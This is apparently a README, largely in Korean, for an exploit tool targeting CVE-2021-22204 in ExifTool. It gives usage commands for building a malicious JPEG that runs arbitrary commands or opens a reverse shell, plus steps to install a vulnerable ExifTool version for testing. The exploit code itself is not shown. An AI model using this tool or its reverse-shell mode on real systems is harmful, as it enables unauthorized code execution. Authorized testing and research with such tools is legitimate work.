
Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution

이 저장소가 마음에 드시나요? ⭐를 눌러주세요!
교육 및 승인된 보안 연구 목적으로만 사용하세요.
@UNICORDev 작성 (@NicPWNs 및 @Dev-Yeoj)
ExifTool 버전 7.44 이상에서 DjVu 파일 형식의 사용자 데이터가 적절히 무력화되지 않아 악성 이미지를 구문 분석할 때 임의 코드 실행이 가능합니다.
이 익스플로잇을 사용하여 취약한 ExifTool 버전에서 코드 실행을 위해 사용할 수 있는 JPEG 이미지 페이로드를 생성하세요. 사용자 정의 명령을 제공하거나 리버스 셸을 생성할 수 있습니다. JPEG 이미지가 자동으로 생성되며, 선택적으로 사용자 지정 JPEG 이미지를 제공하여 페이로드를 삽입할 수 있습니다.
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c 사용자 정의 명령 모드. 실행할 명령을 제공합니다.
-s 리버스 셸 모드. 로컬 IP와 포트를 제공합니다.
-i 사용자 정의 JPEG 이미지 경로. (선택 사항)
-h 이 도움말 메뉴를 표시합니다.
GitHub에서 exploit-CVE-2021-22204.py 다운로드
ExploitDB에서 exploit-CVE-2021-22204.py 다운로드
searchsploit -u
searchsploit -m 50911

Exiftool 버전 12.23
Exiftool 버전 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg